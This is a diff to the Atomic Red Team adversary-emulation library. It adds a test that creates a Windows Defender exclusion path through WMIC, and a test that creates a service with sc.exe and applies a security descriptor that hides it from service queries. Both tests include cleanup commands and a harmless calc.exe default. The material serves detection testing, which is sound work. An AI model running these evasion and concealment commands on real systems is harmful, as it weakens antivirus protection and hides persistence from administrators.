+    Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"
+    cleanup_command: |
+      wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
+    name: command_prompt
     elevation_required: true

atomics/T1564/T1564.md

@@ -12,6 +12,8 @@ Adversaries may also attempt to hide artifacts associated with malicious behavio
 
 - [Atomic Test #3 - Create an "Administrator " user (with a space on the end)](#atomic-test-3---create-an-administrator--user-with-a-space-on-the-end)
 
+- [Atomic Test #4 - Create and Hide a Service with sc.exe](#atomic-test-4---create-and-hide-a-service-with-scexe)
+
 
 <br/>
 
@@ -138,4 +140,48 @@ Remove-LocalUser -Name "Administrator " 2>&1 | out-null
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Create and Hide a Service with sc.exe
+The following technique utilizes sc.exe and sdset to change the security descriptor of a service and "hide" it from Get-Service or sc query.
+
+Upon successful execution, sc.exe creates a new service changes the security descriptor.
+
+https://twitter.com/Alh4zr3d/status/1580925761996828672
+https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 333c7de0-6fbe-42aa-ac2b-c7e40b18246a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| service_name | Name of service to create | String | AtomicService|
+| executable_command | Command to execute as a service | String | C:&#92;Windows&#92;System32&#92;calc.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+sc.exe create #{service_name} binPath= "#{executable_command}"
+sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
+```
+
+#### Cleanup Commands:
+```cmd
+sc.exe delete #{service_name}
+```
+
+
+
+
+
 <br/>

atomics/T1564/T1564.yaml

@@ -59,3 +59,31 @@ atomic_tests:
     elevation_required: true 
     command: New-LocalUser -Name "Administrator " -NoPassword
     cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null
+- name: Create and Hide a Service with sc.exe
+  auto_generated_guid: 333c7de0-6fbe-42aa-ac2b-c7e40b18246a
+  description: |
+    The following technique utilizes sc.exe and sdset to change the security descriptor of a service and "hide" it from Get-Service or sc query.
+
+    Upon successful execution, sc.exe creates a new service changes the security descriptor.
+    
+    https://twitter.com/Alh4zr3d/status/1580925761996828672
+    https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format
+  supported_platforms:
+  - windows
+  input_arguments:
+    service_name:
+      description: Name of service to create
+      type: String
+      default: AtomicService
+    executable_command:
+      description: Command to execute as a service
+      type: String
+      default: 'C:\Windows\System32\calc.exe'
+  executor:
+    command: |
+      sc.exe create #{service_name} binPath= "#{executable_command}"
+      sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
+    cleanup_command: |
+      sc.exe delete #{service_name}
+    name: command_prompt
+    elevation_required: true

atomics/used_guids.txt

@@ -1162,3 +1162,14 @@ c7a0bb71-70ce-4a53-b115-881f241b795b
 24fd9719-7419-42dd-bce6-ab3463110b3c
 251c5936-569f-42f4-9ac2-87a173b9e9b8
 ffcbfaab-c9ff-470b-928c-f086b326089b
+333c7de0-6fbe-42aa-ac2b-c7e40b18246a
+34557863-344a-468f-808b-a1bfb89b4fa9
+95a3c42f-8c88-4952-ad60-13b81d929a9d
+f9b8daff-8fa7-4e6a-a1a7-7c14675a545b
+9c10d16b-20b1-403a-8e67-50ef7117ed4e
+aca9ae16-7425-4b6d-8c30-cad306fdbd5b
+30cbeda4-08d9-42f1-8685-197fad677734
+59d386fc-3a4b-41b8-850d-9e3eee24dfe4
+b854eb97-bf9b-45ab-a1b5-b94e4880c56b
+a574dafe-a903-4cce-9701-14040f4f3532
+36b8dbf9-59b1-4e9b-a3bb-36e80563ef01